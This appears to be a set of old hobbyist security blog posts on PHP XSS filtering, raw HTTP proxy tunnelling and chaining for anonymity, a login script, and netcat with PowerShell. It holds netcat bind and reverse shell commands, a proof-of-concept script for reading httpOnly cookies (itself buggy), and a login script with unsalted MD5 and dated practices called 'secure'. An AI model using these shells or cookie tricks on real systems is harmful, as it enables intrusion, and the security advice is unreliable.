rudimentary anti-x(ross)s(ite)s(cripting)

Why the following piece of code I will present is because not many people sanitize properly user input, as a consequence there may happen sql injection or xss, which may or may not be dangerous.

I’ve seen many examples where people sanitized the input against sql injection, but because they forgot or they didn’t think that it was serious enough, they didn’t filter it against xss. There are many ways to protect against xss, but not every one of those is fully protective.

There is no special function against xss, as there is for sql injection (in the case of using mysql). I’ve seen protections using html stripping functions from PHP; and this type of protections can help keeping away those script kiddies ;)

—

function antixss($input) {
   return htmlentities($input, ENT_QUOTES, “utf-8″);
}

—

Looks pretty simple, and also pretty easy to implement, as a protection:

—

$check = antixss($_POST/$_GET/$_REQUEST/$_COOKIE/$_SERVER);

—

Hope it was a useful article for all of you… maybe because besides learning that XSS protection is needed, even if rudimentary as the one above; you may also have learned that xss attack vectors can be found in $_COOKIE and $_SERVER user agent request….

quote: Javascript is evil

And who I quote? Our little Javascript “Devil” friend SirDarckCat who is pulling it off again by writing, what seems to be a 3 parted series about javascript!

For who can Javascript be evil? For you, your server and local files…

Read the first article from the series at: http://sirdarckcat.blogspot.com/2007/08/javascript-is-just-evil-for-you-part-i.html

What should we do against it? Answer -> http://noscript.net/

Proxy’s for fun and anonymity – vol. 2

In this second “volume” we will discus raw HTTP/SSL tunneling… hope you’ll like this part more than the first one.

raw HTTP proxy

What we need is a telnet able program, I personally use PuTTY, and gonna use it for this example. Recommend you use another telnet program than the windows incorporated one. How do we proxy? In the same way that we initialize a HTTP request to a server, but this time we have to specify the host and the complete url:

—
putty -raw [proxy] [port]

GET http://www.google.com HTTP/1.1

HOST: www.google.com

[Enter]
—

raw SSL tunnel

Because SSL can be used for tunneling. If the proxy has SSL and supports connection to other ports than arbitrary protocols can be run through it; this way SSH is tunneled trough HTTP proxy. An example:

—
putty -raw [proxy] [port]

CONNECT www.google.com:443 HTTP/1.0

Host: www.google.com

[Enter]
—

Proxy Chaining

There are many types of proxy chaining, but going to discuss the HTTP/SSL type, because it is the main theme of this article. What do you need? SSL capable proxies, and perform multiple connect requests like:

—
putty -raw [proxy] [port]

CONNECT proxy:80 HTTP/1.0

CONNECT proxy:3128 HTTP/1.0

CONNECT proxy:8080 HTTP/1.0

GET http://www.google.com HTTP/1.1

HOST: www.google.com

[Enter]
—

Hit me with resources!

Like in vol. 1 I will give you some useful resources, by which you could improve yourself in the proxying field: SSH Proxy, HTTP RFC, HTTP over TLS.

Proxy’s for fun and anonymity – vol. 1

Oh no proxy related material!

Yeah I know that the world is full of proxies, but this ain’t gonna be another tutorial on how to change/set a proxy in Firefox/IExplorer/Opera/etc/passwd… this article is going to lead you straight to the basics of proxies, and how to work with them on raw TCP/IP connections.

But the last part I mentioned is only going to be a part of vol. 2, because I don’t have the time to write all of it at once.

What is a proxy?

A proxy is basically a gateway, a machine or a software that acts like a tunnel… no more, no less (better a short description than a long one). Basic functionality of a proxy:

—
client -> proxy -> web server -> proxy -> client
—

How many types can a proxy be?

As I know there are 3 types of proxies:

1. Transparent – If the website requests the proxy for your IP, then it will get it.
2. Anonymous – The website can’t get hold of your IP.
3. Highly Anonymous – Or so called l33t proxies, nobody installs this kind of proxy on his machine, but can be found in the will due too miss configuration.

Thing to note:a proxy is not only for anonymity, in different occasions you will get a page not found, even if you know the page is online… this kind of things happen when a ring from the internet chain “dies”, and you have to chose another route to go to the desired website.

What is not worth to speak of…

Socks 4/5 proxies and Wingates. Why? They are very rare nowadays, and nobody uses them. They were a big thing in the mid 90’s when IRC was more of a life-style.

Extra proxy stuff

You should also know that besides normal proxies, there have appeared a couple of cgi/php proxy’s… an illustrative example you can find here.

Proxy resources!

I will not make you here a list of proxy resources because there are so many online, but I will give you a link to an article that I think offers the biggest proxy resource on earth -> huge proxy resource!.

Check your proxies!

Many times proxies don’t live long in the wild, and here I mean anonymous and highly anonymous proxies. I recommend you to store your proxies in a flat file in the following way:

—
proxy_address:port

ex:

123.12.65.2:8080
—

And check which proxies work, and which don’t with the proxy checking script, written in PHP, called PHProxy: download

EOF! till vol. 2

The history of hacking

Maybe many of you don’t know the real history of hacking, but is a series that I recommend to everybody who is interested in security… They are a must to be seen, just to know why we all do what we do… The first video of the six parted series is displayed bellow, and the links to the following ones also. Check it out ;)

1-2-3-4-5-6

P.S.: Hope I got the right series… If not, you’ll have to search for a while :þ

Website Anatomy

I’ve started working on a project on myself, of course, by which I am trying to create a unique tool. One of a kind! The one and only! NOT!

What am I going to do? Basically a reconnaissance tool which will drop you the website folder structure, pages, the forms and this kind of things.

For what will be it good? For those cases when you want to look over a website to find possible vulnerable forms… In a normal case this could take a couple of minutes until you look through the pages, check the code and all. But with this tool, seconds, and minutes to spare… for those moments when you get lazy this tool will be developed ;)

secure PHP login script

This is the finalization of the insane idea I had when publishing the login (security through obscurity) – weird PHP script, idea that could not have been finalized without the post that Stephen did as a response to it… he had some great ideas there…

Let’s see how the finalized version of this so much criticized script will end… And of course it will have some obscurity in it. Why? Many hate it that’s why :þ

Firstly we have our MySQL table that goes by the following definition:

—
create table 1nside0ut(
   id0 int not null auto_increment,
   l0gn4m3 varchar(255),
   entryw41 char(32),
   r34ln4m3 varchar(255),
   primary key(id0)
);
—

Why two username fields, and why named that way?
Because the user should have a login username, used just for that and a shown name, which should be different -> harder to bruteforce it (if you don’t know the login username). The strange column names are this way to make the hackers life harder (to guess the column name is pretty hard, especially in this case), but this is less useful for a server that has MySQL 5 or above, see why MySQL Information Schema table.

Our beautiful PHP code, which was so much criticized and appreciated at the same time follows in it’s altered mode:

—
<?php

$username = md5($_POST["username"]);
$passwd = md5($_POST["passwd"]);

$handle = mysql_connect(“user”,”pass”,”mySQLHost”);
      mysql_select_db(“yourdb”);
$query = “SELECT r34ln4m3 FROM 1nside0ut WHERE
      md5(l0gn4m3)=’$username’ AND entryw41=’$passwd’”;

$result = mysql_query($query, $handle);

if (mysql_num_rows($result)!=0) {
      //mark as valid user
      header(“Location: private.php”);
      exit;
}

//if the code reaches this part then the login failed
//wrong username/password

header(“Location: public.php”);

?>
—

Basically this after my opinion the simplest to implement secure login script, even for rookie web developers which quite often mess up with mysql_real_escape_string(), by not using it, but using instead addslashes. And when they do it right they forget to do quote paring.

If there is a method to do it secure, why bother making another script? Just to stay original, and to spread some security through obscurity tips, which even if not appreciated very useful in hardening a hackers life, not to stop it; for that is security by design !?

I wrote recently a better article on the matter: 8 Tips For A Secure Login Script/Admin Panel

httpOnly vs. XmlHttpRequest

I remember well a couple of days ago when I have read on ha.ckers.org this subject and in the first moments I though it will be secure, but after the first three lines realized that the only difference it made was the length of the XSS code

For those who have a trouble in finding the equivalent of document.cookie in ajax here is the PoC (answer):

–
var doc;
try { doc = new XMLHttpRequest(); } catch(e) {}
if (!req) try { doc = new ActiveXObject(“Msxml2.XMLHTTP”); } catch(e) {}
if (!req) try { doc = new ActiveXObject(“Microsoft.XMLHTTP”); } catch(e) {}

doc.open(“HEAD”, document.location, true);
doc.send(null);

doc.onreadystatechange=function() {
if(doc.readyState==4) {
 if(doc.status==200) {
  var hidden=”";
  var headers=doc.getAllResponseHeaders().split(” “);
  for(i=0;i<headers.length;i++) {
   var off1 = headers[i].indexOf(” “)+1;
   var off2 = headers[i].indexOf(“;”)+1;
   var cookie=headers[i].substring(off1, off2);
   hidden=hidden+cookie+” “;
  }
 }
 alert(“httpOnly cookie: “+hidden);
}
}
–

Copy-paste the above snippet of code because in the “years” that are going to come maybe it will be the only way to get cookies.

NetCat & PowerShell -> disaster

Of course I’m being a little to dramatical, after so many days of admiring the new windows shell, and even after writing an article about it on darknet the problems started to fall in. Actually I know just this single issue but I told you I’m too dramatical. One little note before debating the problem: I do not make guilty for this issue nobody, except those MS programmers… kidding… you guys just continue developing powershell and people like me will be looking for bugs instead of you :)

Bugs – here they come

How it all begin? I was playing with netcat, when I got the great idea to use powershell as it’s win shell, instead of the old command prompt. Everything was ok until I connected to my listening net cats… by the way I used it as a bindshell, and as a reverse shell like:

—
nc -l -e powershell.exe -t -p 666 //bindshell
telnet localhost 666 //to connect

nc -l -p 666 //reverse shell
nc -e powershell.exe localhost 666 //to connect
—

Didn’t you understand?

What really is happening is that throe PowerShell bindshell has become reverse shell and reverse shell bindshell. Confusing? I don’t think so, just take a look at how the response is being carried, I mean the less useful result goes where it should go, and the waited result goes where it shouldn’t go…. but what am I talking here if you ever used netcat, you’ll know what I an talking about…